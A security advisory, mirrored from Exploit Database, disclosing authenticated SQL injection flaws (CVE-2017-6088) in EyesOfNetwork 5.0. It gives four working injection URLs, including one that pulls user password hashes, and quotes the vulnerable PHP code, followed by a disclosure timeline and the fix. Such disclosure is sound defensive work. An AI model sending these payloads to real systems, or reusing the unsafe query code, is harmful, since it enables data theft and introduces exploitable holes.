EyesOfNetwork (EON) 5.0 – SQL Injection

• Exploit Database
• 113 阅读

• 作者： Sysdream
  日期： 2017-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41747/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153

  # [CVE-2017-6088] EON 5.0 Multiple SQL Injection   ## Description   EyesOfNetwork ("EON") is an OpenSource network monitoring solution.   ## SQL injection (authenticated)   The Eonweb code does not correctly filter arguments, allowing authenticated users to inject arbitrary SQL requests.   **CVE ID**: CVE-2017-6088   **Access Vector**: remote   **Security Risk**: medium   **Vulnerability**: CWE-89   **CVSS Base Score**: 6.0   **CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L   ### Proof of Concept 1 (root privileges)   The following HTTP request allows an attacker (connected as administrator) to dump the database contents using SQL injections inside either the <code>bp_name</code> or the <code>display</code> parameter. These requests are executed with MySQL root privileges. </code><code> https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271   https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1 </code><code> #### Vulnerable code   The vulnerable code can be found inside the module/monitoring_ged/ged_functions.php</code> file, line 114: </code><code> function list_process($bp,$display,$bdd){ $sql = "select name from bp where is_define = 1 and name!=&apos;".$bp."&apos; and priority = &apos;" . $display . "&apos;"; $req = $bdd->query($sql); $process = $req->fetchall();   echo json_encode($process); } </code><code> ### Proof of Concept 2   The following HTTP request allows an attacker to dump the database contents using SQL injections inside the <code>type</code> parameter: </code><code> https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time= </code><code> #### Vulnerable code   The vulnerable code can be found inside the module/monitoring_ged/ajax.php</code> file, line 64: </code><code> if($_GET["type"] == 0){ $ged_where = "WHERE pkt_type_id!=&apos;0&apos;"; } else { $ged_where = "WHERE pkt_type_id=&apos;".$_GET["type"]."&apos;"; } $gedsql_result1=sqlrequest($database_ged,"SELECT pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<&apos;100&apos;;"); </code><code> ### Proof of Concept 3   The following HTTP request allows an attacker to dump the database contents using SQL injections inside the <code>search</code> parameter: </code><code> https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search=&apos;+AND+(select+sleep(5))+AND+&apos;1&apos;=&apos;1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time= </code><code> #### Vulnerable code   The vulnerable code can be found inside the module/monitoring_ged/ged_functions.php</code> file, line 129. </code><code> if($search != ""){ $like = ""; if( substr($search, 0, 1) === &apos;*&apos; ){ $like .= "%"; } $like .= trim($search, &apos;*&apos;); if ( substr($search, -1) === &apos;*&apos; ) { $like .= "%"; }   $where_clause .= " AND $filter LIKE &apos;$like&apos;"; } </code><code> ### Proof of Concept 4   The following HTTP request allows an attacker to dump the database contents using SQL injections inside the <code>equipment</code> parameter: </code><code> https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit 1)&queue=history </code><code> #### Vulnerable code   The vulnerable code can be found inside the module/monitoring_ged/ged_functions.php</code> file, line 493: </code><code> $gedsql_result1=sqlrequest($database_ged,"SELECT pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!=&apos;0&apos; AND pkt_type_id<&apos;100&apos;;");     while($ged_type = mysqli_fetch_assoc($gedsql_result1)){ $sql = "SELECT DISTINCT $filter FROM ".$ged_type["pkt_type_name"]."_queue_".$queue;   $results = sqlrequest($database_ged, $sql); while($result = mysqli_fetch_array($results)){ if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){ array_push($datas, $result[$filter]); } } } </code><code> ## Timeline (dd/mm/yyyy)   * 01/10/2016 : Initial discovery. * 09/10/2016 : Fisrt contact with vendor. * 23/10/2016 : Technical details sent to the security contact. * 27/10/2016 : Vendor akwnoledgement and first patching attempt. * 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed. * 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our repsonsible disclosure agreement. * 14/03/2017 : Public disclosure.   Thank you to EON for the fast response.   ## Solution   Update to version 5.1.   ## Affected versions   * Version <= 5.0   ## Credits   * Nicolas SERRA <n.serra@sysdream.com>   -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream